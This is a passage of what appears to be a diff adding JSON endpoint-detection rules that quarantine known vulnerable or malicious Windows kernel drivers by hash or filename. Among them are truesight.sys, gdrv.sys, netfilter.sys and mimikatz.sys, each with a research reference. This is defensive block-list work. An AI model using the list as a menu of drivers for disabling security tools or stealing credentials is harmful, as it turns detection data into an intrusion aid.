"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822106Z", + "creation_date": "2026-03-23T11:45:31.822109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c832d3704fa2bab90a7eff166fc143f7ad14f8e2390224ce7fff4065a7bf266", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b5e1f9d-75ef-5dbd-ab26-9fe8482ef160", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808667Z", + "creation_date": "2026-03-23T11:45:31.808669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35d7873d44f2dc85283378765ccaf73d81b9bbe97113aa10cca1a0386048f4f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b666413-53e3-5cf4-b79c-b7ae787c28a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977054Z", + "creation_date": "2026-03-23T11:45:29.977056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "WindowsKernelExplorer.sys", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b712316-3bbc-547b-93d1-7031be42d17a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606350Z", + "creation_date": "2026-03-23T11:45:29.606351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd1beb64cd67169d57ca4dbc602a94f74891962221bb49c09abf3339ce35bc90", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b7eb322-7599-57ef-97a1-79a86d1f9484", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620352Z", + "creation_date": "2026-03-23T11:45:29.620354Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b874d3a-56d7-5fa5-b11d-0d576f6cb47e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821655Z", + "creation_date": "2026-03-23T11:45:31.821657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "e7401e82c5bc55dabde99f6c1cb3257d0bf11c7b10fd7567d0710ee1584671c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ba02586-2ef0-5e57-97ee-10e6deb7621a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604843Z", + "creation_date": "2026-03-23T11:45:29.604845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27cd6ce9797c1a477879b1045751ff8cb54facacb5176f381e17db8d62ebf96e", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bacdcf1-0d18-5e54-b32b-eab628799243", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146492Z", + "creation_date": "2026-03-23T11:45:31.146494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c125ca2f5ea8abbb9ec563dd3208b3fda955b730c3c9362748900c3d59af9c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bc5833a-e484-5b9d-b14e-f00fa03078e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606900Z", + "creation_date": "2026-03-23T11:45:29.606902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "083828dd2e4afe22f5d27b56bd7f5a60e43aea7ec8f8cb0a138be84ee639a09c", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bcacfb9-dfa4-5206-bd03-e39bcb888d9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812117Z", + "creation_date": "2026-03-23T11:45:31.812119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a783f9ff531340c29d7c8301e2fca1a2d4580c664da4bfc5f7d08c3a6e80c15", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bcbc73f-0a67-53cf-9f0f-e336f5c240b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967512Z", + "creation_date": "2026-03-23T11:45:29.967514Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967520Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bcd326d-8c49-5b36-b361-7a4c36af7ab6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612334Z", + "creation_date": "2026-03-23T11:45:29.612335Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612341Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb6b0d304433bf88cc7d57728683dbb4b9833459dc33528918ead09b3907ff22", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bcf078e-a957-5592-87b0-f77f9ef6a727", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608928Z", + "creation_date": "2026-03-23T11:45:29.608930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bcff632-d15e-5cf5-9368-546e98452cc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472795Z", + "creation_date": "2026-03-23T11:45:30.472799Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"4d5059ec1ebd41284b9cea6ce804596e0f386c09eee25becdd3f6949e94139ba", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bd18258-f020-54b5-bdc9-8d83baa06920", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452595Z", + "creation_date": "2026-03-23T11:45:30.452598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43f88737fcdc8cd913ec2643c1841c87794f987e98b1432dd6220f769183467b", + "comment": "Malicious Kernel Driver (aka 1fc7aeeff3ab19004d2e53eae8160ab1.sys) [https://www.loldrivers.io/drivers/aaf8ce1a-e11b-4929-96e0-5ec0666cef2c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bd25302-32b6-5d83-a23b-ed8b7dad738e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471563Z", + "creation_date": "2026-03-23T11:45:31.471567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebb0ca636243f26c37d5172cb9290620a733b75400c5678174be0c22fc9ec9d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bd875fd-b393-5e79-8096-554a59ae5b80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475124Z", + "creation_date": "2026-03-23T11:45:31.475128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70eb61b8464748d65366ad8d7ef9d971c6525bf556137c2603de2283a3f6933e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6be3a5e4-dd40-5d85-9e37-f7f4c1be723f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462029Z", + "creation_date": "2026-03-23T11:45:30.462032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "deade507504d385d8cae11365a2ac9b5e2773ff9b61624d75ffa882d6bb28952", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6befa781-66a1-5aa1-82c2-f7efee44f44e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967586Z", + "creation_date": "2026-03-23T11:45:29.967588Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6befd971-db91-5895-9d4f-6dbf25976eca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823007Z", + "creation_date": "2026-03-23T11:45:31.823010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11608d588b2fa812260ab29907f63eb05f692a61c0ebdb8ef2e9983ca04016fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bf87be8-1d58-5d0b-8df0-9bcc347f543f", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818101Z", + "creation_date": "2026-03-23T11:45:30.818103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dfe57c6a4ef4d2491be325d67428698a61d9c5d2a24dbada10043d313be2c8cc", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6bf9df34-044f-5584-8334-86f78fc57637", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976535Z", + "creation_date": "2026-03-23T11:45:29.976537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcfab3c5f99c15cbb7df17c59914af551b90e0ed3c1dc040bad9927b12b67125", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c0aeebe-57e3-5be2-8a83-0fbf2237a9c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827998Z", + "creation_date": "2026-03-23T11:45:31.828000Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29568e4c63b1ce1fd0a6482e934139b02b999bdb46213483c36540897deddb1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c0f2bec-8887-537f-8953-617f3bd42033", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461752Z", + "creation_date": "2026-03-23T11:45:30.461756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bdcf7457c2caf7fa0386571f972d7f5220d385ad686e2c3536f4c67ba4333e6", + "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6c33ceb3-337f-57e1-82ae-71ef8e6e9ecc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608474Z", + "creation_date": "2026-03-23T11:45:29.608476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3724b39e97936bb20ada51c6119aded04530ed86f6b8d6b45fbfb2f3b9a4114b", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka 
